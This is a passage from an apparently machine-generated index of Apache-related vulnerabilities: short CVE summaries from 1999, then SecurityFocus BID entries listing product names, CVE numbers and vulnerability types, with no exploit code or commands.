5315| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
5316| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
5317| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
5318| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
5319| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
5320| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
5321| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
5322| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
5323| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
5324| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
5325|
5326| SecurityFocus - https://www.securityfocus.com/bid/:
5327| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
5328| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
5329| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
5330| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
5331| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
5332| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
5333| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
5334| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
5335| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
5336| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
5337| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
5338| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
5339| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
5340| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
5341| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
5342| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
5343| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
5344| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
5345| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
5346| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
5347| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
5348| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
5349| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
5350| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
5351| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
5352| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
5353| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
5354| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
5355| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
5356| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
5357| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
5358| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
5359| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
5360| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
5361| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
5362| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
5363| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
5364| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
5365| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
5366| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
5367| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
5368| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
5369| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
5370| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
5371| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
5372| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
5373| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
5374| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
5375| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
5376| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
5377| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
5378| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
5379| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
5380| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
5381| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
5382| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
5383| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
5384| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
5385| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
5386| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
5387| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
5388| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
5389| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
5390| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
5391| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
5392| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
5393| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
5394| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
5395| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
5396| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
5397| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
5398| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
5399| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
5400| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
5401| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
5402| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
5403| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
5404| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
5405| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
5406| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
5407| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
5408| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
5409| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
5410| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
5411| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
5412| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
5413| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
5414| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
5415| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
5416| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
5417| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
5418| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
5419| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
5420| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
5421| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
5422| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
5423| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
5424| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
5425| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
5426| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
5427| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
5428| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
5429| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
5430| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
5431| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
5432| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
5433| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
5434| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
5435| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
5436| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
5437| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
5438| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
5439| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
5440| [100447] Apache2Triad Multiple Security Vulnerabilities
5441| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
5442| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
5443| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
5444| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
5445| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
5446| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
5447| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
5448| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
5449| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
5450| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
5451| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
5452| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
5453| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
5454| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
5455| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
5456| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
5457| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
5458| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
5459| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
5460| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
5461| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
5462| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
5463| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
5464| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
5465| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
5466| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
5467| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
5468| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
5469| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
5470| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
5471| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
5472| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
5473| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
5474| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
5475| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
5476| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
5477| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
5478| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
5479| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
5480| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
5481| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
5482| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
5483| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
5484| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
5485| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
5486| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
5487| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
5488| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
5489| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
5490| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
5491| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
5492| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
5493| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
5494| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
5495| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
5496| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
5497| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
5498| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
5499| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
5500| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
5501| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
5502| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
5503| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
5504| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
5505| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
5506| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
5507| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
5508| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
5509| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
5510| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
5511| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
5512| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
5513| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
5514| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
5515| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
5516| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
5517| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
5518| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
5519| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
5520| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
5521| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
5522| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
5523| [95675] Apache Struts Remote Code Execution Vulnerability
5524| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
5525| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
5526| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
5527| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
5528| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
5529| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
5530| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
5531| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
5532| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
5533| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
5534| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
5535| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
5536| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
5537| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
5538| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
5539| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
5540| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
5541| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
5542| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
5543| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
5544| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
5545| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
5546| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
5547| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
5548| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
5549| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
5550| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
5551| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
5552| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
5553| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
5554| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
5555| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
5556| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
5557| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
5558| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
5559| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
5560| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
5561| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
5562| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
5563| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
5564| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
5565| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
5566| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
5567| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
5568| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
5569| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
5570| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
5571| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
5572| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
5573| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
5574| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
5575| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
5576| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
5577| [91736] Apache XML-RPC Multiple Security Vulnerabilities
5578| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
5579| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
5580| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
5581| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
5582| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
5583| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
5584| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
5585| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
5586| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
5587| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
5588| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
5589| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
5590| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
5591| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
5592| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
5593| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
5594| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
5595| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
5596| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
5597| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
5598| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
5599| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
5600| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
5601| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
5602| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
5603| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
5604| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
5605| [90482] Apache CVE-2004-1387 Local Security Vulnerability
5606| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
5607| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
5608| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
5609| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
5610| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
5611| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
5612| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
5613| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
5614| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
5615| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
5616| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
5617| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
5618| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
5619| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
5620| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
5621| [86399] Apache CVE-2007-1743 Local Security Vulnerability
5622| [86397] Apache CVE-2007-1742 Local Security Vulnerability
5623| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
5624| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
5625| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
5626| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
5627| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
5628| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
5629| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
5630| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
5631| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
5632| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
5633| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
5634| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
5635| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
5636| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
5637| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
5638| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
5639| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
5640| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
5641| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
5642| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
5643| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
5644| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
5645| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
5646| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
5647| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
5648| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
5649| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
5650| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
5651| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
5652| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
5653| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
5654| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
5655| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
5656| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
5657| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
5658| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
5659| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
5660| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
5661| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
5662| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
5663| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
5664| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
5665| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
5666| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
5667| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
5668| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
5669| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
5670| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
5671| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
5672| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
5673| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
5674| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
5675| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
5676| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
5677| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
5678| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
5679| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
5680| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
5681| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
5682| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
